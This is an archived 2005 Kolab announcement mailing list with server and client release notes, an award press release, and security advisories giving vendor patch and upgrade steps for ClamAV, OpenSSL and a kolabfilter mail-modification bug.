Server (Version 20050620, Kolab server 2.0 final) For upgrading and installation instructions, please refer to the 1st.README file in the source directory. Changes since RC 4, 20050617: - kolab-webadmin 20050530 -> 20050616 * Fixing: Issue813 (password entry not of type password) Issue810 (Cannot delete addressbook entry) $Id: release-notes.txt,v 1.16 2005/06/20 16:25:21 bh Exp $ -------------- next part -------------- Release notes for the Kolab KDE Client 2.0 ========================================== 2005-06-20, Bernhard Herzog Changes since 2.0 RC 3 ---------------------- kmail ------ * Don't allow operations to be performed on items which are already being operated on. Namely holding down the Del key was triggering multiple Deletes/Moves for the same message pointer, which for any but the first command was dangeling. Quite obvious, in retrospect... (backport) * Make sure that the cc is properly taken into account during identity detection on replies. (backport) * Don't use KIO::del to delete the local cache when removing a dimap folder. The underlying KMFolderMailDir does unlinks, to avoid a storm of progress dialogs, so let's rely on that. (backport) * Show icon as checked when it is. https://intevation.de/roundup/aegypten/issue324. * Backport of status setting fix: if the status of single mails was changed locally, but nothing else, the "status changed locally" flag was not set, and the status changes thus lost on sync. * Two extra special paranoid sync state resets in impossible code paths just to make sure we don't delete mail unwantedly even if hell freezes over. * Updated version number to proko2 2.0 kontact ------ * Start korgac when starting kontact, so that reminders work even if the user doesn't click on the Calendar icon. https://intevation.de/roundup/kolab/issue789 * Updated version number to proko2 2.0 korganizer ------ * The format for kmail serial numbers is kmail:foo/bar, not kmail://foo/bar. Adjust. * Much simpler way of starting korgac; don't start korgac from the korganizer part, kontact does it now. libkdepim ------ * Remove config(), use the one from KABC instead to avoid two singletons. Fixes "ldap config changes not immediately honored by kaddressbook" https://intevation.de/roundup/kolab/issue795 * Very tricky bug in the LDAP parsing code, leading to corrupted entries, e.g. with 'name' and 'email' being set to the name. QByteArray is explicitely shared, so when we get new contents from the LDIF parser class, we need to detach it before putting it into a list... https://intevation.de/roundup/kolab/issue796 kaddressbook ------ * Fix signal/slot connection error -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050621/1719615c/smime.bin From bh at intevation.de Wed Jul 27 16:34:44 2005 From: bh at intevation.de (Bernhard Herzog) Date: Wed, 27 Jul 2005 16:34:44 +0200 Subject: [Kolab-announce] Security Advisory 02 for Kolab Server Message-ID: The Clam AntiVirus package used by Kolab 2.0 contains several buffer overflows that can be exploited remotely. A new ClamAV RPM with a fix is available. See the Kolab Security Advisory 02 below for details. Bernhard Herzog -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Kolab Security Issue 02 20050727 ================================ Package: Kolab Server Vulnerability: buffer overflow, remotely exploitable Kolab Specific: no Dependent Packages: none Summary - ------- The Clam AntiVirus package contains several buffer overflows that can be exploited remotely. Affected Versions - ----------------- This affects all servers which have ClamAV 0.86.1 or earlier versions running. Kolab Server 2.0 and previous releases of the 2.0 branch are affected. Fixes - ----- Upgrade to ClamAV 0.86.2. A new ClamAV RPM is available from the Kolab download mirrors as the file security-updates/20050727/clamav-0.86.2-20050726.src.rpm The mirrors are listed on http://kolab.org/mirrors.html While the mirrors are catching up, you can also get the package via rsync: # rsync -tzv rsync://rsync.kolab.org/kolab/server/security-updates/20050727/clamav-0.86.2-20050726.src.rpm . This package can be installed on your Kolab Server with # /kolab/bin/openpkg rpm --rebuild clamav-0.86.2-20050726.src.rpm # /kolab/bin/openpkg rpm \ -Uvh /kolab/RPM/PKG/clamav-0.86.2-20050726.--kolab.rpm ##optional # /kolab/bin/freshclam Details - ------- http://www.securityfocus.com/bid/14359 the vulnerabilities present themselves when the ClamAV antivirus library handles malformed files. Details of the vulnerability can be found in http://www.rem0te.com/public/images/clamav.pdf At least 4 of its file format processors contain remote security bugs. Specifically, during the processing of TNEF, CHM, & FSG formats an attacker is able to trigger several integer overflows These vulnerabilities can be reached by default and triggered without user interaction by sending an e-mail containing crafted data. Timeline - -------- 20050725 clamav vulnerability published by rem0te 20050727 kolab update and security advisory published -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQFC55W50vCiU5+ISsgRAuRRAJwPMHzzXu0FwB9GeEv6kq3WOBqvdwCeLKot d85iJsTD7wjyY+ebkIzklQk= =NPAR -----END PGP SIGNATURE----- -- Intevation GmbH http://intevation.de/ Skencil http://skencil.org/ Thuban http://thuban.intevation.org/ From bh at intevation.de Wed Sep 14 21:37:58 2005 From: bh at intevation.de (Bernhard Herzog) Date: Wed, 14 Sep 2005 21:37:58 +0200 Subject: [Kolab-announce] Kolab Server 2.0.1 released Message-ID: <200509142138.02221.bh@intevation.de> Kolab Server 2.0.1 hase been released The biggest change in this release is the move to OpenPKG 2.4 as the basis for the kolab server. This move is necessary to benefit from the security updates from OpenPKG as the version of OpenPKG used in Kolab Server 2.0.0 is not maintained anymore by the OpenPKG project. As a result the new packages in this release fix some security problems present in the packages of the previous Kolab Server releases. See the release notes (attached) for more details. We recommend updating kolab installation to this new kolab server release. Other than security updates, there have been some bug fixes (see release notes). Bernhard Herzog -------------- next part -------------- Release notes Kolab2 Server (Version 20050913, Kolab Server 2.0.1) For upgrading and installation instructions, please refer to the 1st.README file in the source directory. Since 2.0.1 RC1: - security fixes from OpenPKG: pcre-6.0-2.4.1 OpenPKG-SA-2005.018 fsl-1.6.0-2.4.1 OpenPKG-SA-2005.018 proftpd-1.3.0rc1-2.4.1 OpenPKG-SA-2005.020 apache-1.3.33-2.4.1_kolab OpenPKG-SA-2005.017 because of the dependencies, some other packages were also updated. Others need to be explicitely rebuild because of static linking and the same version number: dbtool-1.6-2.4.0 grep-2.5.1a-2.4.0 openldap-2.2.27-2.4.0_kolab php-4.3.11-2.4.0_kolab postfix-2.2.3-2.4.1_kolab procmail-3.22-2.4.0 sasl-2.1.21-2.4.0 spamassassin-3.0.3-2.4.1 - imapd-2.2.12-2.4.0_kolab2 * Fixing: Issue782 (setinfo for mailboxes in Admin.pm for Cyrus) Issue901 (reconstruct in Admin.pm or imapd calls wrong binaries) - kolabd-1.9.4-20050913 * Fixing: Issue851 (kolabquotawarn uses system sendmail) Issue885 (kolabd creates shared folders in wrong directory) - kolab-resource-handlers-0.3.9-20050912 * Fixing: Issue878 (fb retrieval only works with lowercase email addresses) - kolab-webadmin-0.4.0-20050831 * Fixing: Issue915 (non-ascii not handled correctly in webadmin interface) - perl-kolab-5.8.7-2.0_20050912 better logging when running kolabconf Changes since 2.0: - Switch to OpenPKG 2.4. As a result of this, practically all packages have been updated. Up to now the Kolab Server used OpenPKG 2.2. The current release of OpenPKG is 2.4, though, and the OpenPKG project only provides security advisories and updates for the most recent release and its immediate predecessor. Therefore moving to OpenPKG 2.4 is necessary to benefit from the OpenPKG updates. The db package has not been updated to the version from OpenPKG 2.4 yet to avoid potential stability problems with OpenLDAP. - Security update for OpenPKG 2.4: zlib-1.2.2-2.4.2 OpenPKG-SA-2005.014 and OpenPKG-SA-2005.013 - A new clamav package fixing a buffer overflow. This is the package mentioned in the kolab security advisory 02 http://kolab.org/security/kolab-vendor-notice-02.txt - better deletion handling. Now more objects are deleted using kolabDeleteFlag (issues 845 and 855) - perl-kolab 5.8.5-20050530 -> 5.8.7-2.0_20050719 * Fixing: Issue845 (groupOfNames cleanup handling) Issue855 (make shared folder and external deletion same as users) - kolab-webadmin 20050616 -> 20050620 * Fixing: Issue845 (groupOfNames cleanup handling) Issue855 (make shared folder and external deletion same as users) - kolabd 20050615 -> 20050722 * Fixing: Issue791 (automatic invitation handling uses http instead of https) Issue845 (groupOfNames cleanup handling) Issue851 (kolabquotawarn uses system sendmail) Issue855 (make shared folder and external deletion same as users) - kolab-resource-handlers 20050615 -> 20050727 * Fixing: Issue825 (Bad error handling of kolabmailboxfilter) $Id: release-notes.txt,v 1.15.2.7 2005/09/14 17:57:58 thomas Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://kolab.org/pipermail/kolab-announce/attachments/20050914/fd5790f2/attachment.bin From thomas at intevation.de Wed Sep 21 18:26:31 2005 From: thomas at intevation.de (Thomas Arendsen Hein) Date: Wed, 21 Sep 2005 18:26:31 +0200 Subject: [Kolab-announce] Security Advisory 03 for Kolab Server Message-ID: <20050921162631.GA9273@intevation.de> Kolab Security Issue 03 20050921 ================================ Package: Kolab Server Vulnerability: buffer overflow, DOS, remotely exploitable Kolab Specific: no Dependent Packages: none Summary ------- The Clam AntiVirus package contains a boundary condition error and fails to handle exceptional conditions, which can be exploited remotely. Affected Versions ----------------- This affects all servers which have ClamAV 0.86.2 or earlier versions running. Kolab Server 2.0.1 and previous releases of the 2.0 branch are affected. Fixes ----- Upgrade to ClamAV 0.87. A new ClamAV RPM is available from the Kolab download mirrors as security-updates/20050921/clamav-0.87-20050916.src.rpm A binary RPM for Debian woody (ix86) is available as security-updates/20050921/clamav-0.87-20050916.ix86-debian3.0-kolab.rpm The mirrors are listed on http://kolab.org/mirrors.html While the mirrors are catching up, you can also get the package via rsync: # rsync -tzv rsync://rsync.kolab.org/kolab/server/security-updates/20050921/clamav-0.87-20050916.src.rpm . This package can be installed on your Kolab Server with # /kolab/bin/openpkg rpm --rebuild clamav-0.87-20050916.src.rpm # /kolab/bin/openpkg rpm \ -Uvh /kolab/RPM/PKG/clamav-0.87-20050916.--kolab.rpm A new /kolab/etc/clamav/clamav.conf will probably be written, remove the clamav.conf.rpmsave file, run kolabconf and make sure clamav starts: # rm /kolab/etc/clamav/clamav.conf # /kolab/sbin/kolabconf # /kolab/etc/rc clamav start ##optional # /kolab/bin/freshclam Details ------- http://www.securityfocus.com/bid/14866 ClamAV UPX Compressed Executable Buffer Overflow Vulnerability http://www.securityfocus.com/bid/14867 ClamAV FSG Compressed Executable Infinite Loop DOS Vulnerability Timeline -------- 20050916 clamav vendor released combined security and functional update 20050921 kolab update and security advisory published -- Email: thomas at intevation.de http://intevation.de/~thomas/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://kolab.org/pipermail/kolab-announce/attachments/20050921/43152311/attachment.bin From bh at intevation.de Fri Oct 14 22:52:43 2005 From: bh at intevation.de (Bernhard Herzog) Date: Fri, 14 Oct 2005 22:52:43 +0200 Subject: [Kolab-announce] Security Advisory 04 for Kolab Server (openssl) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Kolab Security Issue 04 20051014 ================================ Package: openssl Vulnerability: Potential SSL 2.0 Rollback (CAN-2005-2969) Kolab Specific: no Dependent Packages: apache imapd openldap perl-ssl php postfix proftpd sasl Summary - ------- According to a vendor security advisory, a potential SSL 2.0 protocol rollback attack vulnerability exists in the cryptography toolkit OpenSSL. The vulnerability potentially affects applications that use the SSL/TLS server implementation provided by OpenSSL. Such applications are affected if they use the option "SSL_OP_MSIE_SSLV2_RSA_PADDING". Applications using neither "SSL_OP_MSIE_SSLV2_RSA_PADDING" nor "SSL_OP_ALL" are not affected. Also, applications that disable use of SSL 2.0 are not affected. Affected Versions - ----------------- OpenPKG packages of openssl-0.9.7g-2.4.1 or earlier are affected. Kolab Server 2.0.1 and previous releases of the 2.0 branch are affected. You can check the installed version with: /kolab/bin/openpkg rpm -q openssl Fixes - ----- Note: The fix described here is for Kolab server 2.0.1. If you still run an older version, please upgrade to 2.0.1 first. Since SSLv2 can't be disabled via a configuration setting for all services running on a Kolab server, the OpenSSL package has to be updated and the dependent packages have to be rebuilt so that they use the new OpenSSL version. The updated OpenPKG package openssl-0.9.7g-2.4.2 is available from the usual kolab mirrors under the directory security-updates/20051014/ . While the mirrors are catching up, you can also get the files via rsync: # rsync -tzvr rsync://rsync.kolab.org/kolab/server/security-updates/20051014 . If you have installed the Kolab server from sources, download the directory security-updates/20051014/sources/ If you installed the ix86-debian3.0 binaries, download security-updates/20051014/ix86-debian3.0/ Both directories contain the new OpenSSL package plus obmtool and obmtool.conf like in a kolab release. In addition, the ix86-debian3.0 directory contains updated binaries of the dependent packages. In both cases, download all files in the appropriate directory, chdir into the downloaded directory and run /kolab/bin/openpkg rc all stop ./obmtool kolab This will install the new openssl package and rebuild/reinstall the dependent packages. Afterwards start the server again, making sure to regenerate the config files as you would for a normal Kolab server update. Details - ------- http://www.openpkg.org/security/OpenPKG-SA-2005.022-openssl.html OpenPKG Security Advisory OpenPKG-SA-2005.022 http://www.openssl.org/news/secadv_20051011.txt OpenSSL Security Advisory on the vendor's site http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2969 Common Vulnerabilities and Exposures (CVE): CAN-2005-2969 Timeline - -------- 20051011 OpenSSL vendor released patch and new versions containing the fix 20051011 OpenPKG created new package containing the fix, not yet announced 20051014 Kolab update and security advisory published -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDUBdo0vCiU5+ISsgRApj4AKDIZhknDia/OrolG4yUGaC3JZwRWQCfXbyw b6sFUXJ80PKVQkgbLbQDSNo= =ff+w -----END PGP SIGNATURE----- From thomas at intevation.de Thu Oct 20 18:34:56 2005 From: thomas at intevation.de (Thomas Arendsen Hein) Date: Thu, 20 Oct 2005 18:34:56 +0200 Subject: [Kolab-announce] Security Advisory 05 for Kolab Server Message-ID: <20051020163455.GA25596@intevation.de> Kolab Security Issue 05 20051020 ================================ Package: clamav Vulnerability: buffer overflow, DOS, remotely exploitable Kolab Specific: yes Dependent Packages: none Summary ------- Thorsten Schnebeck informed us on the kolab-users mailing list that the obmtool.conf file distributed with Kolab Security Issue 04 20051014 may cause a downgrade of clamav to a vulnerable version. Affected Versions ----------------- ClamAV-0.86.2 or earlier are affected. You can check the installed version with: /kolab/bin/openpkg rpm -q clamav Fixes ----- Upgrade to ClamAV 0.87 again by following the instructions from Kolab Security Issue 03 20050921, included here for convenience: A new ClamAV RPM is available from the Kolab download mirrors as security-updates/20050921/clamav-0.87-20050916.src.rpm A binary RPM for Debian woody (ix86) is available as security-updates/20050921/clamav-0.87-20050916.ix86-debian3.0-kolab.rpm The mirrors are listed on http://kolab.org/mirrors.html Details ------- http://kolab.org/security/kolab-vendor-notice-03.txt Kolab Security Issue 03 20050921 http://kolab.org/security/kolab-vendor-notice-04.txt Kolab Security Issue 04 20051014 http://kolab.org/pipermail/kolab-users/2005-October/003582.html Thorsten Schnebeck published the problem on kolab-users Timeline -------- 20051014 Kolab Security Issue 04 published with incorrect obmtool.conf 20051020 Problem published on kolab-users mailing list 20051020 Problem confirmed and updated security advisory published -- Email: thomas at intevation.de http://intevation.de/~thomas/ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20051020/358dfd6c/attachment.bin From bh at intevation.de Fri Nov 4 20:35:25 2005 From: bh at intevation.de (Bernhard Herzog) Date: Fri, 4 Nov 2005 20:35:25 +0100 Subject: [Kolab-announce] Security Advisory 06 for Kolab Server Message-ID: <200511042035.29582.bh@intevation.de> Kolab Security Issue 06 20051104 ================================ Package: Kolab Server Vulnerability: buffer overflow, DOS, remotely exploitable Kolab Specific: no Dependent Packages: none Summary ------- The Clam AntiVirus package contains a boundary condition error and fails to handle exceptional conditions, which can be exploited remotely. Affected Versions ----------------- This affects all servers which have ClamAV 0.87 or earlier versions running. Kolab Server 2.0.1 and previous releases of the 2.0 branch are affected. Fixes ----- Upgrade to ClamAV 0.87.1 A new ClamAV RPM is available from the Kolab download mirrors as security-updates/20051104/clamav-0.87.1-20051104.src.rpm A binary RPM for Debian woody (ix86) is available as security-updates/clamav-0.87.1-20051104.ix86-debian3.0-kolab.rpm The mirrors are listed on http://kolab.org/mirrors.html While the mirrors are catching up, you can also get the package via rsync: # rsync -tzv rsync://rsync.kolab.org/kolab/server/security-updates/20051104/clamav-0.87.1-20051104.src.rpm . MD5 sums: 474c7e68feeec520fb2b0b95cb084482 clamav-0.87.1-20051104.ix86-debian3.0-kolab.rpm 13be516211e28fd9d861de051a3d0c17 clamav-0.87.1-20051104.src.rpm This package can be installed on your Kolab Server with # /kolab/bin/openpkg rpm --rebuild clamav-0.87.1-20051104.src.rpm # /kolab/bin/openpkg rpm \ -Uvh /kolab/RPM/PKG/clamav-0.87.1-20051104.--kolab.rpm The installation process will likely leave a freshclam.conf.rpmsave or clamav.conf.rpmsave in /kolab/etc/clamav/. Since freshclam.conf and clamav.conf are generated files, remove the rpmsave files, run kolabconf and make sure clamav starts. E.g. # rm /kolab/etc/clamav/clamav.conf.rpmsave # /kolab/sbin/kolabconf # /kolab/etc/rc clamav start ##optional # /kolab/bin/freshclam Details ------- http://sourceforge.net/project/shownotes.php?release_id=368319 ClamAV 0.87.1 release notes Timeline -------- 20051103 clamav vendor released combined security and functional update 20051104 kolab update and security advisory published -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://kolab.org/pipermail/kolab-announce/attachments/20051104/4d03f348/attachment.bin From jan at intevation.de Thu Nov 17 10:23:15 2005 From: jan at intevation.de (Jan-Oliver Wagner) Date: Thu, 17 Nov 2005 10:23:15 +0100 Subject: [Kolab-announce] Kolab wins "Best Groupware Server" Award Message-ID: <20051117092315.GA18117@intevation.de> For Immediate Release Frankfurt, 15th of November 2005 Kolab wins "Best Groupware Server" Award Kolab has been given the Linux New Media Award 2005 in the category 'Best Groupware Server'. The jury chose Kolab on top of contenders like Openexchange, OpenGroupware, GroupWise, eGroupWare, Scalix and Lotus Notes. This was revealed during a ceremony Tuesday evening at the LinuxWorld Expo 2005 in Frankfurt, Germany. Within three years of its existence, Kolab has grown to be a respected groupware that was also mentioned positively in both editions of Migration Guidelines for public administrations of the Germany Ministry of the Interior. "While the focus is on enterprise users, many others have meanwhile come to appreciate our approach!" says Bernhard Reiter from the Kolab-Konsortium. "It is attractive because Kolab offers a modern, scalable server with a choice of clients for numerious platforms including KDE Kontact and full Microsoft Outlook suport." The jury consisted of about 200 experts selected by Linux New Media, a publisher of 14 regular magazines about GNU/Linux. The Awards are given out yearly in changing categories to recognise most significant product, project or organisations. Bernhard Reiter was also nominated to be part of the jury for the award, but abstained from any voting. About Kolab: Kolab is a groupware and email solution that integrates proven Free Software components. In Fall 2002 the project started aiming at environments with both, GNU/Linux and Windows desktops. The design allows the integration with other products, e.g. directory and management services like dirActory, GOsa, or LAM. www.kolab.org About Kolab-Konsortium: The Kolab-Konsortium offers commercial maintenance, support, consulting and development for Kolab. Members are Intevation, erfrakon and Klar?lvdalens Datakonsult. Recently a partnership was announced to integrate Kolab into Univention's Coporate Server offering. www.kolab-konsortium.com Press Contact Jan-Oliver Wagner +49 541 33508 55 Jan-Oliver.Wagner at intevation.de From bh at intevation.de Thu Dec 1 18:42:31 2005 From: bh at intevation.de (Bernhard Herzog) Date: Thu, 1 Dec 2005 18:42:31 +0100 Subject: [Kolab-announce] Kolab Server 2.1 snapshot release 20051201 Message-ID: <200512011842.35747.bh@intevation.de> Hi all, I've just uploaded a new snapshot release of the Kolab Server 2.1 branch. You'll find it in the server/development-2.1 directory. The mirrors should have the files shortly. The release notes are attached. Bernhard -------------- next part -------------- Release notes Kolab2 Server (Version 20051201, Kolab Server pre 2.1) This is a development snapshot of the kolab server leading up to a 2.1 release. For upgrading and installation instructions, please refer to the 1st.README file in the source directory. At this point an upgrade from 2.0 is not recommended. Instructions for the upgrade from 2.0 are in 1st.README, but they're not very well tested yet. Differences between Kolab 2.0.x and 2.1: - Simple multi-domain support The Kolab server can now accept mail for multiple email domains. There is also a new class of maintainers which are only allowed to manage settings for a subset of the mail domains of the kolab server. Changes since 2.1-20050926: - perl-kolab 5.8.7-20051122 -> 5.8.7-20051130 * Group and resource accounts also use the calendar user now to write to the calendar folder when accepting invitations automatically. - kolabd 2.0.99-20051122 -> 2.0.99-20051130 * More autoconfiscation patches from Richard Bos * The kolab_smtpdpolicy makes use of the smtp authentication credentials used by the sender now. * Fixing: Issue1002 (Documented path to template is wrong in some files) Issue1004 (insuffient access for admins and maintainers) Issue1009 (Preparation patch for the autoconfiscated krh module) - kolab-webadmin 2.0.99-20051122 -> 2.0.99-20051130 * Fixing: Issue1007 (kolab-webadmin autoconfiscation patch by Richard Bos) - kolab-horde-framework 2.0.99-20051122 -> 2.0.99-20051130 * Fix dependicies - kolab-resource-handlers 2.0.99-20051122 -> 2.0.99-20051130 * Always use the calendar folder when writing to the calendar folder. kolabEncryptedPassword is no longer used. $Id: release-notes.txt,v 1.24 2005/12/01 16:36:10 bh Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://kolab.org/pipermail/kolab-announce/attachments/20051201/16df3dc7/attachment.bin From bernhard.herzog at intevation.de Thu Dec 15 20:13:10 2005 From: bernhard.herzog at intevation.de (Bernhard Herzog) Date: Thu, 15 Dec 2005 20:13:10 +0100 Subject: [Kolab-announce] Kolab Server 2.1 snapshot release 20051215 Message-ID: <200512152013.16200.bernhard.herzog@intevation.de> Hi all, I've just uploaded a new snapshot release of the Kolab Server 2.1 branch. You'll find it in the server/development-2.1 directory. The mirrors should have the files shortly. The release notes are attached. Bernhard -------------- next part -------------- Release notes Kolab2 Server (Version 20051215, Kolab Server pre 2.1) This is a development snapshot of the kolab server leading up to a 2.1 release. For upgrading and installation instructions, please refer to the 1st.README file in the source directory. At this point an upgrade from 2.0 is not recommended. Instructions for the upgrade from 2.0 are in 1st.README, but they're not very well tested yet. Differences between Kolab 2.0.x and 2.1: - Simple multi-domain support The Kolab server can now accept mail for multiple email domains. There is also a new class of maintainers which are only allowed to manage settings for a subset of the mail domains of the kolab server. Changes since 2.1-20051201: - Upgrade to OpenPKG 2.5 All RPMs have been updated to the latest OpenPKG 2.5 versions. This includes several security updates: http://www.openpkg.org/security/OpenPKG-SA-2005.025-perl.html http://www.openpkg.org/security/OpenPKG-SA-2005.027-php.html http://www.openpkg.org/security/OpenPKG-SA-2005.028-curl.html http://www.openpkg.org/security/OpenPKG-SA-2005.029-apache.html The new versions of the db and openldap RPMs require some manual intervention for this update. See 1st.README for details. - kolabd 2.0.99-20051130 -> 2.0.99-20051215 * The documentation has been moved from /kolab/share/kolabd/doc to /kolab/share/doc/kolabd * Patches: Issue1017 (Autoconfiscation patch by Richard Bos) Issue1021 (Autoconfiscation patch by Richard Bos) Issue1027 (Fix for a problem introduced by autoconfiscation) Issue1028 (kolabd/namespace/libexec improvements) - kolab-webadmin 2.0.99-20051130 -> 2.0.99-20051213 Updated Dutch translation (Richard Bos) * Fixing: Issue1023 (fix some typos in messages) $Id: release-notes.txt,v 1.27 2005/12/15 18:57:19 bh Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://kolab.org/pipermail/kolab-announce/attachments/20051215/e913f652/attachment.bin From bernhard.reiter at intevation.de Thu Dec 22 20:34:16 2005 From: bernhard.reiter at intevation.de (Bernhard Reiter) Date: Thu, 22 Dec 2005 20:34:16 +0100 Subject: [Kolab-announce] Security Advisory 07 for Kolab Server Message-ID: <200512222034.16887.bernhard.reiter@intevation.de> -------------- next part -------------- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Kolab Security Issue 07 20051222 ================================ Package: Kolab Server Vulnerability: Some transported emails are modified, potentially leading to broken email-signatures or attachments. Kolab Specific: yes Impact: low Summary - -------- If the Kolab Server transports an email bigger than 8 K Byte and there is a dot (".") character at the wrong place, kolabfilter will double this dot and a modified email will be delivered. This can lead to broken email clear-text signatures or broken attachments. Affected Versions - ----------------- All Kolab Servers version 2 released to far, including 2.1 snapshots. In particular versions 2.0.0 and 2.0.1 have this bug. Fixes - ----- Apply the patch below. E.g. with the command: patch -i kolabmailtransport.diff /kolab/var/kolab/php/kolabfilter/kolabmailtransport.php You can also get the patch from issue1042 of Kolab's tracker. 9bdd3f3e4964eb8e6099db8b22b8c238 kolabmailtransport.diff +=== cut here ==== |diff -u -p -r1.3.2.1 kolabmailtransport.php |--- kolabmailtransport.php 28 Jul 2005 02:20:36 -0000 1.3.2.1 |+++ kolabmailtransport.php 22 Dec 2005 17:44:38 -0000 |@@ -32,6 +32,7 @@ class KolabMailTransport { | function start($sender,$recips) { | $this->createTransport(); | $myclass = get_class($this->transport); |+ $this->got_newline = false; | | if (!$this->transport) { | return new PEAR_Error('Failed to connect to $myclass: ' . $error->getMessage(), 421); |@@ -99,8 +100,10 @@ class KolabMailTransport { | * Because a single leading period (.) signifies an end to the data, | * legitimate leading periods need to be "doubled" (e.g. '..'). | */ |- if( $data[0] == '.' ) $data = '.'.$data; |+ if( $this->got_newline && $data[0] == '.' ) $data = '.'.$data; | $data = str_replace("\n.", "\n..", $data); |+ if( $data[count($data)] == "\n" ) $this->got_newline = true; |+ else $this->got_newline = false; | } | | function data( $data) { |@@ -126,6 +129,7 @@ class KolabMailTransport { | var $host; | var $port; | var $transport; |+ var $got_newline; | }; | | class KolabLMTP extends KolabMailTransport { +=== cut here ==== Timeline - -------- 20051222 Bug report came in. Reproduced and fixed the bug. Advisory Published. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD4DBQFDqvxZh9ag3dpKERYRAnilAKDP4ysnWU3pi4WLMaGfD8J6SspOfACYnniX OV/nQeosx/b9SJZWb5TSKw== =i8mz -----END PGP SIGNATURE----- -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://kolab.org/pipermail/kolab-announce/attachments/20051222/3c53e06b/attachment.bin